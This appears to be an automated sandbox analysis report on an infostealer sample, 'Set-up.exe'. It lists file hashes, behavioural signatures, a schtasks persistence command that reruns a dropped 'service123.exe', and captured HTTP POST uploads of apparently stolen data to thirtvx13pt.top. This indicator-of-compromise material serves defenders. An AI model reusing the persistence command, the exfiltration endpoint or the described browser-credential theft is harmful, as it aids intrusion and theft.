Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
144s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/10/2024, 22:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Set-up.exe
Resource
win10-20240611-en
Behavioral task
behavioral2
Sample
Set-up.exe
Resource
win7-20240729-en
Behavioral task
behavioral3
Sample
Set-up.exe
Resource
win10v2004-20240802-en
General
-
Target
Set-up.exe
-
Size
6.7MB
-
MD5
e8f6d16ad939c06d972ed7afb3bcf335
-
SHA1
a7c1b12fc853a28d468b5fa9bc7e6be63a05b4f2
-
SHA256
5df593109be04e8263413ee6afbebe8f136cd0136e2fc7b070a19099f7ab015d
-
SHA512
79d4a997a9a85f76871d9f5df74444f481de040651c904007ff5a626ecd7f5cdd5ecb47d274d82351d49f5de71cdff0502fc2b0735897844ee19cf79bb5498e6
-
SSDEEP
196608:gONiBa+mq9aq5g7PLnYiJGb6/CdnK8dN:gONiBa+mq9aq5g7PLnYiJGbb
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 3048 service123.exe 3596 service123.exe 2708 service123.exe -
Loads dropped DLL 3 IoCs
pid Process 3048 service123.exe 3596 service123.exe 2708 service123.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Set-up.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Set-up.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Set-up.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1644 schtasks.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3172 wrote to memory of 3048 3172 Set-up.exe 78 PID 3172 wrote to memory of 3048 3172 Set-up.exe 78 PID 3172 wrote to memory of 3048 3172 Set-up.exe 78 PID 3172 wrote to memory of 1644 3172 Set-up.exe 79 PID 3172 wrote to memory of 1644 3172 Set-up.exe 79 PID 3172 wrote to memory of 1644 3172 Set-up.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\Set-up.exe"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3048
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3596
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2708
Network
-
Remote address:8.8.8.8:53Requestthirtvx13pt.topIN AResponsethirtvx13pt.topIN A185.244.181.140
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.229.19
-
Remote address:185.244.181.140:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary87984241
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 411
Host: thirtvx13pt.top
ResponseHTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 22:02:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:8.8.8.8:53Request140.181.244.185.in-addr.arpaIN PTRResponse140.181.244.185.in-addr.arpaIN PTRv982091macloudhost
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:185.244.181.140:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary67913200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 77003
Host: thirtvx13pt.top
ResponseHTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 22:02:33 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:185.244.181.140:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary72653909
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 24618
Host: thirtvx13pt.top
ResponseHTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 22:02:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
1.0kB 381 B 6 4
HTTP Request
POST http://thirtvx13pt.top/v1/upload.phpHTTP Response
200 -
79.8kB 1.5kB 62 32
HTTP Request
POST http://thirtvx13pt.top/v1/upload.phpHTTP Response
200 -
25.9kB 981 B 24 19
HTTP Request
POST http://thirtvx13pt.top/v1/upload.phpHTTP Response
200
-
203 B 308 B 3 3
DNS Request
thirtvx13pt.top
DNS Response
185.244.181.140
DNS Request
8.8.8.8.in-addr.arpa
DNS Request
nexusrules.officeapps.live.com
DNS Response
52.111.229.19
-
146 B 266 B 2 2
DNS Request
140.181.244.185.in-addr.arpa
DNS Request
19.229.111.52.in-addr.arpa